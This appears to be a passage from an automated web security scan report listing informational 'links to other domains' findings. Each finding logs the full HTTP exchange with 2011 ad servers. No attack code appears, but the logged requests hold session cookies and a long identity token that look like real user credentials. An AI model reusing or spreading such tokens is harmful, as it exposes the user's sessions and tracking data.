User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 11077
Date: Sat, 26 Mar 2011 20:36:05 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:05 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Fri Mar 11 11:54:58 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
2%3Bqcs%3D680%3Bqcs%3D679%3Bqcs%3D678%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttps://chrome.google.com/webstore?category=ext&utm_campaign=en&utm_source=en-oa-na-us-N5295.HuffingtonPost-ext&utm_medium=oa"><img src="http://s0.2mdn.net/2878480/Google_Chrome_users_728x90_en.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
20.11. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 642
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:37:09 GMT
Expires: Sat, 26 Mar 2011 01:37:09 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/8a/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_a
...[SNIP]...
OLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DIP%26source%3DDisplay_MM_RewardCert%26filter%3D%230"><img src="http://s0.2mdn.net/viewad/1293907/reward_728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...
20.12. http://ad.doubleclick.net/adj/huffpost.politics/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;hot=fb;hot=tw;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250,300x600;tile=5;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 56376
Date: Sat, 26 Mar 2011 20:36:08 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:08 GMT
Cache-Control: private, x-gzip-ok=""

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
%3Bqcs%3D1592%3Bqcs%3D683%3Bqcs%3D682%3Bqcs%3D680%3Bqcs%3D679%3Bqcs%3D678%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://www.amazon.com/Treme-Complete-Season-Steve-Zahn/dp/B002AMUDK8/ref=d_wb_Treme032211"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/1234407/PID_1572261_300x600_backUp.jpg" width="300" height="600" BORDER=0 alt=""/></A>
...[SNIP]...
20.13. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news/curtain

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/huffpost.politics/news/curtain;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=curtain;hot=fb;hot=tw;dcopt=ist;u=938x200%7Cbpage%7Ccurtain%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=938x200;tile=2;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1032
Date: Sat, 26 Mar 2011 20:36:06 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:06 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ad6/0/0/%2a/g;44306;0-0;0;41438682;25461-938/200;0/0/0;u=938x200|bpage|curtain|@depressing,@mostpopular,@recommend,@ypoliti
...[SNIP]...
rry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;~aopt=2/0/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
20.14. http://ads.tw.adsonar.com/adserving/getAds.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515622&pid=2259768&ps=-1&zw=580&zh=275&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:07 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 17105


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</p>
                                                               <img src="http://view.atdmt.com/CNT/view/307356360/direct;wi.1;hi.1/01/" width="1" height="1" border="0" alt="" />
                                                                                                               
                                                           </div>
...[SNIP]...
</p>
                                                               <img src="http://view.atdmt.com/CNT/view/305649790/direct;wi.1;hi.1/01/" width="1" height="1" border="0" alt="" />
                                                                                                               
                                                           </div>
...[SNIP]...
<td class="sps_1515621" style="height:12px;" nowrap="nowrap" align="right">
                                       &nbsp;<a href="http://advertising.aol.com/technology/sponsored-listings" target="_blank">
                                       
                                           Buy a link here
                                       
                                       </a>
...[SNIP]...
<td><iframe src="http://cdn.tacoda.at.atwola.com/an/qseg.html" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
20.15. http://advertising.microsoft.com/search-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /search-advertising

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search-advertising?s_cid=us_bing_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/22/2011 21:02:41&Microsoft.VisitStartDate=03/22/2011 21:02:41&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=22&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300816975750:ss=1300816958515; MS0=38ceddfa393547488a60161c1088230a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Mar 2011 00:58:45 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_bing_footer; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:58:44 GMT
Content-Length: 59618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
<![endif]--><script src="//ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...
</a><a href="http://mediacentre.ninemsn.com.au" title="http://mediacentre.ninemsn.com.au" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Australia: ninemsn" omniture_products="market selector" target="_blank">Australia: ninemsn</a>
...[SNIP]...
</a><a href="http://ads.kr.msn.com" title="http://ads.kr.msn.com" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Korea" omniture_products="market selector" target="_blank">Korea</a>
...[SNIP]...
</a><a href="http://www.arabia.msn.com/contact.aspx" title="http://www.arabia.msn.com/contact.aspx" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Saudi Arabia" omniture_products="market selector" target="_blank">Saudi Arabia</a>
...[SNIP]...
</a><a href="http://advertising.za.msn.com/default.aspx" title="http://advertising.za.msn.com/default.aspx" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: South Africa" omniture_products="market selector" target="_blank">South Africa</a>
...[SNIP]...
</a><a href="http://www.fr.msn.ch" title="http://www.fr.msn.ch" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Switzerland: French" omniture_products="market selector" target="_blank">Switzerland: French</a>
...[SNIP]...
<noscript><img src="http://msntradeadv.112.2O7.net/b/ss/msntradeadv/1/H.1--NS/0" height="1" width="1" border="0" alt=""></noscript>
...[SNIP]...
<div style="position:absolute;top:0;left:0;"><img alt="" title="" src="http://c.msn.com/c.gif?PI=38824&amp;DI=350&amp;PS=89224" width="1px" height="1px" style="visibility:hidden;"></div>
...[SNIP]...
</span><a href="http://g.msn.com/2privacy/enus" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="footernav: Privacy" omniture_products="footernav" target="_blank">Privacy</a>
...[SNIP]...
</span><a href="http://g.msn.com/0TO_/enus" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="footernav: Legal" omniture_products="footernav" target="_blank">Legal</a>
...[SNIP]...
20.16. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/noperf=1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/noperf=1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5113.1/221794/0/-1/noperf=1;alias=93312491;cfp=1;noaddonpl=y;kvugc%3D0%3Bkvpg=music.aol%2Fradioguide%2Fbb;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93312491;target=_blank;aduho=-300;grp=171825820;misc=171825820 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 584

document.write('<a href="http://at.atwola.com/?adlink/5113/1955435/0/170/AdId=199151;BnId=1830;itime=171781802;kvugc=0;kvpg=music%2Eaol%2Fradioguide%2Fbb;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=933
...[SNIP]...
9999:61674:60489:60740:60490:56262:61576:60493:50963:60491:60515:60514:52614:53656:52842:56830:52615:60546:56918:60500:56920:56555:51133:56988:56917:53435:54173:56500:52611:54463:56969;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/198/Ad0St1Sz170Sq0V1Id20049606.jpg" border=0 alt="Advertisement" width="300" height="250"></a>
...[SNIP]...
20.17. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=300x75

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5113.1/221794/0/-1/size=300x75;noperf=1;alias=93309868;cfp=1;noaddonpl=y;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93309868;target=_blank;aduho=-300;grp=171798765;misc=171798765 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 550

document.write('<a href="http://at.atwola.com/?adlink/5113/1649059/0/2018/AdId=1071763;BnId=201;itime=171752636;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93309868;kvtid=16lsqii1n1a3cr;kvseg=99999:61674:60489:60740:60490:56262:61576:60493:50963:60491:60515:60514:52614:53656:52842:56830:52615:60546:56918:60500:56920:56555:51133:56988:56917:53435:54173:56500:52611:54463:56969;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/381/Ad0St1Sz2018Sq0V1Id20131197.JPG" border=0 alt="Advertisement" width="300" height="75"></a>
...[SNIP]...
20.18. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121423&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&dt=1301103472597&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103473670&frm=0&adk=3965760877&ga_vid=444046128.1301103474&ga_sid=1301103474&ga_hid=1149958600&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=1077&xpc=hYA46mUL3p&p=http%3A//www.soundingsonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1300988408; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:37:08 GMT
Last-Modified: Sat, 26 Mar 2011 01:37:08 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x1, ewr-bidder-x2
Server: MMBD/3.5.0
Content-Length: 1230
Content-Type: text/html
Connection: keep-alive

<div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://pixel.mathtag.com/creative/img?mt_adid=70&mt_aid=60843514997508161&mt_e
...[SNIP]...
